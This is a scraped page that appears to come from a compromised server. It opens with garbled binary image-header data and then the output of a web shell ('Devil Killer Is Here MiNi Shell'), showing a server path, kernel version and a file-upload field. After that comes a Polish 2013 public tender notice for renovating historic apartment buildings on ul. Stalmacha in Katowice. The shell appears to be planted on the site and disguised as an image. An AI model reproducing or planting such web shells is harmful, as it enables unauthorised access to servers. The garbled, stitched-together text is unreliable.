JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131016/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131016/215805-N-2013.html

<p class="kh_header"><b>Katowice: Remont i przebudowę zabytkowych budynków mieszkalnych przy ul. Stalmacha 18, 18a, 20 w Katowicach</b><br>
<b>Numer ogłoszenia: 215805 - 2013; data zamieszczenia: 16.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komunalny Zakład Gospodarki Mieszkaniowej , ul. Grażyńskiego 5, 40-126 Katowice, woj. śląskie, tel. 32 258 20 21-25, faks 32 258 20 25, 41 63 167.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kzgm.katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont i przebudowę zabytkowych budynków mieszkalnych przy ul. Stalmacha 18, 18a, 20 w Katowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest rozbiórka garaży przy ul. Stalmacha 18, przebudowa budynku oficyny przy ul. Stalmacha 18a oraz remont budynków frontowych przy ul. Stalmacha 18 i 20 oraz zagospodarowanie podwórza wraz budową muru oporowego i śmietnika przy ul. Stalmacha 18 w Katowicach.
Tylko budynki przy ul. Stalmacha 18 i 20 wpisane są do centralnego rejestru zabytków pod nr A/370/12 z dnia 23.03.2012r.
2.	Roboty budowlane obejmować będą następujący zakres:
1)	Rozbiórka garaży wraz z wykonaniem operatu geodezyjnego;
2) 	Remont budynków frontowych; 
3)	Przebudowa budynku mieszkalnego wielorodzinnego - oficyny wraz z przyłączami kanalizacyjnymi, zagospodarowanie terenu, odwodnienie, budowa śmietnika i muru oporowego.

Budynki frontowe wymagają wykonania następujących robót budowlanych: wykonania częściowej izolacji przeciwwilgociowej ścian fundamentowych i wymiana tynków w gankach piwnicznych, wykonanie zabezpieczeń antykorozyjnych konstrukcji balkonów, renowacja ceramicznych okładzin ścian klatek schodowych.
Budynek oficyny wymaga wykonania przede wszystkim następujących robót budowlanych: wymiana stropów, przebudowa klatki schodowej, zmiana układu funkcjonalnego lokali mieszkalnych.
3.	Wybrany Wykonawca przed rozpoczęciem robót budowlanych będzie zobowiązany do przedstawienia Zamawiającemu do akceptacji harmonogramu rzeczowo - finansowego realizacji robót w układzie miesięcznym, który stanowić będzie Załącznik nr 2 do umowy.
Przy tworzeniu harmonogramu należy zachować następującą kolejność prac:
1) wykonanie rozbiórki garaży i budowa muru oporowego;
2) wykonanie remontu budynków frontowych;
3) przebudowa oficyny,  w tym należy uwzględnić:
- rozbiórkę ścianek działowych, skucie tynków, demontaż stolarki otworowej, instalacji               i urządzeń;
- wymiana stropów rozpoczynając od najniższej kondygnacji;
- przebudowa dachu;
- przebudowa klatki schodowej;
- murowanie ścianek działowych i kanałów wentylacyjnych;
- montaż instalacji i urządzeń zgodnie z projektami branżowymi; 
4) wykonanie robót wykończeniowych;
5) zagospodarowanie terenu.
Zamawiający informuje, że raz w miesiącu będzie organizował narady koordynacyjne          w siedzibie Działu Dokumentacji i Inwestycji przy ul. Mieszka I 2 w Katowicach lub na terenie budowy, na których wymagana będzie obecność ze strony Wykonawcy: właściciela firmy lub osoby upoważnionej, kierownika budowy oraz kierowników robót.
4.	Zamawiający informuje, że budynki przy ul. Stalmacha 18, 18a, 20 w Katowicach usytuowane są w zwartej zabudowie miejskiej wzdłuż chodnika ul. Stalmacha, a oficyna przylega do budynku frontowego nr 18. Usytuowanie to powoduje znaczne utrudnienia w wykonywaniu robót budowlanych, dostawie materiałów, wywozie gruzu. Teren budowy ogranicza się wyłącznie do działek objętych pozwoleniem na budowę. Należy zastosować szczególną ostrożność z uwagi na prowadzenie robót w oficynie oraz na podwórzu, w bezpośrednim sąsiedztwie zamieszkałych budynków. Należy zapewnić dojście mieszkańców do przyległych budynków oraz do ich śmietnika. 
Jednocześnie roboty należy prowadzić w sposób, który ograniczy pylenie, aby nie doszło do zabrudzenia nowo wykonanych elewacji budynków przy ul. Stalmacha 18 i 20.
5.	Zamawiający w trakcie realizacji prac wymaga ciągłej obecności na terenie budowy kierownika budowy. 
6.	Szczegółowy opis przedmiotu zamówienia określa Dokumentacja: Przedmiary robót, Dokumentacja projektowa oraz Specyfikacja Techniczna Wykonania i Odbioru Robót (Załącznik nr 9 do SIWZ), w tym dla budynków frontowych przy ul. Stalmacha 18 i 20 dokumentacja obejmuje: Przedmiary robót oraz analogicznie zapisy Specyfikacji Technicznej Wykonania i Odbioru Robót przebudowy oficyny ul. Stalmacha 18a w odpowiednich częściach (Załącznik nr 9 do SIWZ).
7.	Minimalny wymagany przez Zamawiającego okres gwarancji na wykonane roboty, zabudowane materiały i urządzenia wynosi 5 lat, licząc od dnia podpisania protokołu końcowego odbioru technicznego robót budowlanych.
8.	Minimalny Wymagany przez Zamawiającego okres rękojmi za wady, określonej zgodnie z Kodeksem cywilnym, wynosi 5 lat, licząc od dnia podpisania protokołu końcowego odbioru technicznego robót budowlanych.
9.	Zamawiający dopuszcza zastosowanie materiałów i urządzeń równoważnych (tj. o parametrach technicznych i jakościowych nie gorszych niż określone w SIWZ). Jeżeli Wykonawca zaoferuje materiały lub urządzenia równoważne, zobowiązany jest dostarczyć wraz z ofertą opis pozycji równoważnych z podaniem wytwórcy, parametrów technicznych i jakościowych, potwierdzonych kartami technicznymi wyrobu wydanymi przez producenta. W przypadku wątpliwości, co do równoważności oferowanych wyrobów Zamawiający wezwie Wykonawcę do złożenia we wskazanym terminie wyjaśnień dotyczących treści oferty.
10.	Tam, gdzie w dokumentacji projektowej, specyfikacji technicznej lub przedmiarach, przedmiot zamówienia został opisany za pomocą norm, aprobat, specyfikacji technicznej i systemów odniesienia, o których mowa w art. 30 ust. 1-3 ustawy Zamawiający dopuszcza rozwiązania równoważne opisywanym.
11.	UWAGA! Od Wybranego Wykonawcy będzie wymagane posiadanie ważnej polisy ubezpieczeniowej, o której mowa w §10 ust. 1 Wzoru umowy (Załącznik nr 8 do SIWZ), obejmującej ubezpieczenie o.c. z tytułu prowadzenia robót objętych umową oraz z tytułu zdarzeń, jakie mogą zaistnieć w związku z prowadzeniem robót, w następstwie, których Wykonawca jest zobowiązany do naprawienia szkody osobowej lub rzeczowej wyrządzonej osobie trzeciej w miejscu i sąsiedztwie prowadzenia robót. Polisa powinna zawierać: ubezpieczenie deliktowe z klauzulą dotyczącą szkód wyrządzonych przez podwykonawców oraz dodatkowe ubezpieczenie ryzyk budowy z tytułu szkód, w tym szkód związanych z pracą maszyn i urządzeń..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówień uzupełniających w wysokości nie większej niż 20% wartości zamówienia podstawowego, o których mowa w art. 67 ust. 1 pkt 6 ustawy.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.13.00-1, 45.11.12.00-0, 45.26.23.11-4, 45.26.23.10-7, 45.26.25.00-6, 45.32.00.00-6, 45.41.00.00-4, 45.26.00.00-7, 45.43.00.00-0, 45.40.00.00-0, 45.42.00.00-7, 45.30.00.00-0, 45.23.32.22-1, 45.11.27.12-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Każdy Wykonawca biorący udział w niniejszym postępowaniu zobowiązany jest wnieść wadium, zgodnie z art. 45 ustawy w wysokości: 50.000,00 zł.
2.	Wadium należy złożyć przed upływem terminu składania ofert, tj. do dnia 31.10.2013r. do godz. 07:45.
3.	Wadium może być wnoszone w jednej lub kilku następujących formach: 
1) pieniądzu; 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
3) gwarancjach bankowych; 
4) gwarancjach ubezpieczeniowych; 
5) w innych formach przewidzianych w art. 45 ustawy.
4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto Zamawiającego:
Komunalny Zakład Gospodarki Mieszkaniowej w Katowicach
Nazwa banku: ING Bank Śląski S.A. O / Katowice
Nr rachunku: 13 1050 1214 1000 0023 3495 0603
	W tytule przelewu należy wpisać: 
Wadium na: Remont i przebudowę zabytkowych budynków mieszkalnych przy                     ul. Stalmacha 18, 18a, 20 w Katowicach.
5.	W przypadku wadium wnoszonego w pieniądzu termin wniesienia wadium zostanie dotrzymany, jeżeli wadium będzie na koncie Zamawiającego przed upływem terminu składania ofert. 
6.	Do oferty należy dołączyć dokument potwierdzający wniesienie wadium w formie pieniądza.
7.	Oryginał wadium wniesionego w formie innej niż pieniądz należy złożyć wraz z ofertą w osobnej kopercie, natomiast kopię tego dokumentu, potwierdzoną za zgodność z oryginałem, należy dołączyć do oferty. 
8.	Zwrot wadium dokonany będzie zgodnie z zapisami art. 46 ustawy.
9.	Zamawiający zatrzymuje wadium wraz z odsetkami, gdy nastąpią okoliczności przewidziane w art. 46 ust. 4a i ust. 5 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełniania warunku będzie złożenie oświadczenia na podstawie art. 22
ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku posiadania wiedzy i doświadczenia należy wykazać wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie:
- co najmniej 2 robót budowlanych polegających na przebudowie lub nadbudowie budynku mieszkalnego wielorodzinnego lub budynku użyteczności publicznej o kubaturze co najmniej 3.000 m3, podlegającego ochronie Miejskiego lub Wojewódzkiego Konserwatora Zabytków;
- co najmniej 2 robót budowlanych polegających na wykonaniu zagospodarowaniu terenu. Przez zagospodarowanie terenu należy rozumieć wykonanie nawierzchni z bruku kamiennego lub bruku z kostek betonowych oraz budowę lub wymianę kanalizacji zewnętrznej.
Zamawiający dopuszcza połączenie wyżej wskazanych robót pod warunkiem spełniania przez robotę łączącą ww. zakresy wszystkich warunków wymaganych dla poszczególnych robót.
Przez budowę należy rozumieć wykonywanie obiektu budowlanego w określonym miejscu, a także odbudowę, rozbudowę, nadbudowę obiektu budowlanego - zgodnie z art. 3 pkt 6 ustawy Prawo budowlane z dnia 7.07.1994 r. (Dz.U. 1994, Nr 89, poz. 414 ze zm.);
Przez przebudowę należy rozumieć wykonywanie robót budowlanych, w wyniku których następuje zmiana parametrów użytkowych lub technicznych istniejącego obiektu budowlanego, z wyjątkiem charakterystycznych parametrów, jak: kubatura, powierzchnia zabudowy, wysokość, długość, szerokość bądź liczba kondygnacji - zgodnie z art. 3 pkt 7a ustawy Prawo budowlane;
Przez budynek mieszkalny wielorodzinny należy rozumieć budynek przeznaczony na mieszkania zawierający 2 lub więcej mieszkań - zgodnie z § 3 pkt 4a Rozporządzenia Ministra Infrastruktury  z dnia 12.04.2002r. w sprawie warunków technicznych, jakim powinny odpowiadać  budynki i ich usytuowanie (Dz. U.  2002, Nr 75, poz. 690 ze zm.);
Przez budynek użyteczności publicznej należy rozumieć budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, opieki zdrowotnej, opieki społecznej i socjalnej, obsługi bankowej, handlu, gastronomii, usług, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, świadczenia usług pocztowych lub telekomunikacyjnych oraz inny ogólnodostępny budynek przeznaczony do wykonywania podobnych funkcji, w tym także budynek biurowy i socjalny - zgodnie z w § 3 pkt 6 Rozporządzenia Ministra Infrastruktury  z dnia 12.04.2002r.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełniania warunku będzie złożenie oświadczenia na podstawie art. 22
ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku dysponowania osobami zdolnymi do wykonania zamówienia należy wykazać dysponowanie osobą lub osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi następujące kwalifikacje zawodowe, doświadczenie oraz zakres wykonywanych czynności:
- Kierownikiem budowy (minimum jedna osoba) - posiadającym uprawnienia 
do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej  zgodnie z prawem budowlanym, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz 3-letnią praktykę zawodową na ww. stanowisku po uzyskaniu powyższych uprawnień;
- Kierownikiem robót branżowych - branża instalacyjna (minimum jedna osoba) - posiadającym uprawnienia do kierowania robotami budowlanymi                        w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych - zgodnie                 z prawem budowlanym, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz      3-letnią praktykę zawodową na ww. stanowisku po uzyskaniu powyższych uprawnień;
- Kierownikiem robót branżowych - branża instalacyjna (minimum jedna osoba) - posiadającym uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - zgodnie z prawem budowlanym, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz 3-letnią praktykę zawodową na ww. stanowisku po uzyskaniu powyższych uprawnień.
Zamawiający dopuszcza połączenie wyżej wskazanych funkcji pod warunkiem spełnienia przez osobę łączącą te funkcje wszystkich warunków wymaganych dla poszczególnych funkcji. 
Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 18.03.2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2008,  Nr 63, poz. 394 ze zm.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku dotyczącego sytuacji ekonomicznej i finansowej należy wykazać:
- dysponowanie środkami finansowymi w wysokości co najmniej 1.000.000,00 zł lub posiadanie zdolności kredytowej w takiej samej wysokości.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca zobowiązany jest wskazać w wykazie wykonanie:
- co najmniej 2 robót budowlanych polegających na przebudowie budynku mieszkalnego wielorodzinnego lub budynku użyteczności publicznej o kubaturze co najmniej 3.000 m3, podlegającego ochronie Miejskiego lub Wojewódzkiego Konserwatora Zabytków;
- co najmniej 2 robót budowlanych polegających na wykonaniu zagospodarowaniu terenu. Przez zagospodarowanie terenu należy rozumieć wykonanie nawierzchni z bruku kamiennego lub bruku z kostek betonowych oraz budowę lub wymianę kanalizacji zewnętrznej,
oraz złożyć poświadczenia określające, że zostały wykonane w sposób należyty oraz wskazujące, że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Zamawiający dopuszcza połączenie wyżej wskazanych robót pod warunkiem spełniania przez robotę łączącą ww. zakresy wszystkich warunków wymaganych dla poszczególnych robót.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

